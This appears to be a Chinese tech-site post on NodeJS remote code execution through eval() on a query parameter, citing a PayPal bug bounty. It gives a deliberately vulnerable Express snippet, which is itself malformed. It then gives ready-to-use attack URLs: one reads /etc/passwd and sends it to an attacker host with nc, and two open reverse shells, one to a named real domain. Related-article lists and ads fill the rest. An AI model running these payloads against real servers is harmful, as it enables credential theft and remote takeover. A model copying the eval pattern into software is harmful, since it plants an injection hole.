首页
所有分类
TAGS
文字工具 EMOJI BIBLE
服务器 NodeJs

NodeJS远程代码执行

Posted in NodeJs onAugust 28, 2016

背景

@Artsploit在挖PayPal的漏洞时,发现一处NodeJS代码执行,奖励$10000美金。

测试

var express = require('express'); 
var app = express(); 
app.get('/', function (req, res) { 
  res.send('Hello eval(req.query.q));
  console.log(req.query.q);
});
app.listen(8080, function () { 
  console.log('Example listening on port 8080!');
});

任意文件读取

http://host:8080/?q=require('child_process').exec('cat+/etc/passwd+|+nc+attackerip+80')

GET SHELL

http://host:8080/?q=var+net+=+require("net"),+sh+=+require("child_process").exec("/bin/bash");var+client+=+new+net.Socket();client.connect(80,+"attackerip",+function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});

GET SHELL2

http://host:8080/?q=require("child_process").exec('bash -c "bash -i >%26 /dev/tcp/wufeifei.com/7890 0>%261"')

NodeJS远程代码执行

- Author -

hebedich

声明:登载此文出于传递更多信息之目的,并不意味着赞同其观点或证实其描述。

NodeJs 相关文章推荐
Nodejs极简入门教程(三):进程
Oct 27 NodeJs
nodejs开发微博实例
Mar 25 NodeJs
nodejs中全局变量的实例解析
Mar 07 NodeJs
nodejs读写json文件的简单方法(必看)
Mar 09 NodeJs
nodejs async异步常用函数总结(推荐)
Nov 17 NodeJs
Nodejs中crypto模块的安全知识讲解
Jan 03 NodeJs
详解NODEJS的http实现
Jan 04 NodeJs
nodejs中Express与Koa2对比分析
Feb 06 NodeJs
NodeJS 中Stream 的基本使用
Jul 30 NodeJs
Nodejs中的JWT和Session的使用
Aug 21 NodeJs
nodejs文件夹深层复制功能
Sep 03 NodeJs
nodejs实现百度舆情接口应用示例
Feb 07 NodeJs
用NodeJS实现批量查询地理位置的经纬度接口
Aug 16 #NodeJs
使用nodejs中httpProxy代理时候出现404异常的解决方法
Aug 15 #NodeJs
NodeJs的优势和适合开发的程序
Aug 14 #NodeJs
在windows上用nodejs搭建静态文件服务器的简单方法
Aug 11 #NodeJs
Nodejs抓取html页面内容(推荐)
Aug 11 #NodeJs
用nodejs的实现原理和搭建服务器(动态)
Aug 10 #NodeJs
nodejs如何获取时间戳与时间差
Aug 03 #NodeJs
双向链表(6) 单向链表(1) 区块链(2) keeplive_timeout(1) text-shadow(1) 模拟登录(1) NumPy(2) RTMP(1) Scheduled(1) TypeScript(2)
You might like
一个php作的文本留言本的例子(四)
2006/10/09 PHP
PHP如何编写易读的代码
2007/07/10 PHP
PHP获取二维数组中某一列的值集合
2015/12/25 PHP
PHP反射机制原理与用法详解
2017/02/15 PHP
jquery仿京东导航/仿淘宝商城左侧分类导航下拉菜单效果
2013/04/24 Javascript
js点击事件链接的问题解决
2014/04/25 Javascript
jQuery实现多级下拉菜单jDropMenu的方法
2015/08/28 Javascript
js强制把网址设为默认首页
2015/09/29 Javascript
Jquery+ajax+JAVA(servlet)实现下拉菜单异步取值
2016/03/23 Javascript
JavaScript入门教程之引用类型
2016/05/04 Javascript
浅析JavaScript 箭头函数 generator Date JSON
2016/05/23 Javascript
EasyUI在表单提交之前进行验证的实例代码
2016/06/24 Javascript
jQuery简单倒计时效果完整示例
2016/09/20 Javascript
详解为Angular.js内置$http服务添加拦截器的方法
2016/12/20 Javascript
ionic中列表项增加和删除的实现方法
2017/01/22 Javascript
js模仿微信朋友圈计算时间显示几天/几小时/几分钟/几秒之前
2017/04/27 Javascript
详解jQuery同步Ajax带来的UI线程阻塞问题及解决办法
2017/08/09 jQuery
JS实现全屏预览F11功能的示例代码
2018/07/23 Javascript
详细分析Node.js 多进程
2020/06/22 Javascript
python3中int(整型)的使用教程
2017/03/23 Python
python集合比较(交集,并集,差集)方法详解
2018/09/13 Python
python如何基于redis实现ip代理池
2020/01/17 Python
Python运行DLL文件的方法
2020/01/17 Python
python推导式的使用方法实例
2021/02/28 Python
css3+jq创作含苞待放的荷花
2014/02/20 HTML / CSS
css3实现简单的白云飘动背景特效
2020/10/28 HTML / CSS
6号汽车旅馆预订:Motel 6
2018/02/11 全球购物
美国正版电视节目和电影在线观看:Hulu
2018/05/24 全球购物
卡骆驰新加坡官网:Crocs新加坡
2018/06/12 全球购物
梅西百货官网:Macy’s
2020/08/04 全球购物
Chupi官网:在爱尔兰手工制作的订婚、结婚戒指和精美珠宝
2020/09/28 全球购物
学校端午节活动总结
2015/02/11 职场文书
安装工程师岗位职责
2015/02/13 职场文书
2015年公务员转正工作总结
2015/04/24 职场文书
严以用权专题学习研讨会发言材料
2015/11/09 职场文书
导游词幽默开场白
2019/06/26 职场文书